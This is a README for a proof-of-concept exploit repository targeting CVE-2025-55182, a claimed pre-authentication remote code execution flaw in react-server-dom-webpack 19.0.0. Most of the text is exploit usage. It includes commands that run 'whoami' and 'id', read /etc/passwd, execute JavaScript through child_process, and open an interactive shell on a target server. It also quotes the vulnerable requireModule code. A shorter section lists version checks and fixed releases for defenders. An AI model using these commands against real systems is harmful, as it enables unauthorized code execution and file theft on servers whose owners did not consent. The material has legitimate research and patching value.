Critical Pre-Authentication Remote Code Execution in React Server Components
A complete proof-of-concept demonstrating CVE-2025-55182, a critical vulnerability in react-server-dom-webpack@19.0.0 that allows unauthenticated attackers to execute arbitrary code via prototype chain pollution.
# Clone the repository
git clone https://github.com/whiteov3rflow/CVE-2025-55182-poc
cd CVE-2025-55182-poc
# Exploit the server
python3 exploit.py --url http://localhost:3002 --cmd "whoami"CVE ID: CVE-2025-55182
Affected Package: react-server-dom-webpack@19.0.0
Severity: Critical (Pre-auth RCE)
CVSS: 10.0
The requireModule function uses bracket notation (moduleExports[metadata[2]]) without checking hasOwnProperty, allowing prototype chain traversal to access dangerous Node.js built-in modules like vm, child_process, and fs.
// Vulnerable code in react-server-dom-webpack
function requireModule(metadata) {
var moduleExports = __webpack_require__(metadata[0]);
return moduleExports[metadata[2]]; // ❌ No hasOwnProperty check!
}Execute commands:
python3 exploit.py --url http://localhost:3002 --cmd "whoami"
python3 exploit.py --url http://localhost:3002 --cmd "cat /etc/passwd"Read files:
python3 exploit.py --url http://localhost:3002 --read /etc/hostnameExecute JavaScript:
python3 exploit.py --url http://localhost:3002 --js "Math.sqrt(144)"Interactive shell:
python3 exploit.py --url http://localhost:3002 --shellRun vulnerability test:
python3 exploit.py --url http://localhost:3002 --testQuiet mode (for scripting):
python3 exploit.py --url http://localhost:3002 --cmd "id" --quietpython3 exploit.py --url http://target:3000 --js "process.mainModule.require('child_process').execSync('whoami').toString()"python3 exploit.py --url http://target:3000 --cmd "whoami" --method child_processpython3 exploit.py --url http://target:3000 --read /etc/passwd --method fsCheck if your app is vulnerable:
./check-vulnerability.shOr manually:
grep "react-server-dom-webpack" package.json
npm list react-server-dom-webpackVulnerable versions:
react-server-dom-webpack@19.0.0react-server-dom-webpack@19.0.0-rc-*
Fixed versions:
react-server-dom-webpack@19.1.0+
This POC is provided for educational and security research purposes only. Only test against systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
Made with 💀 for security research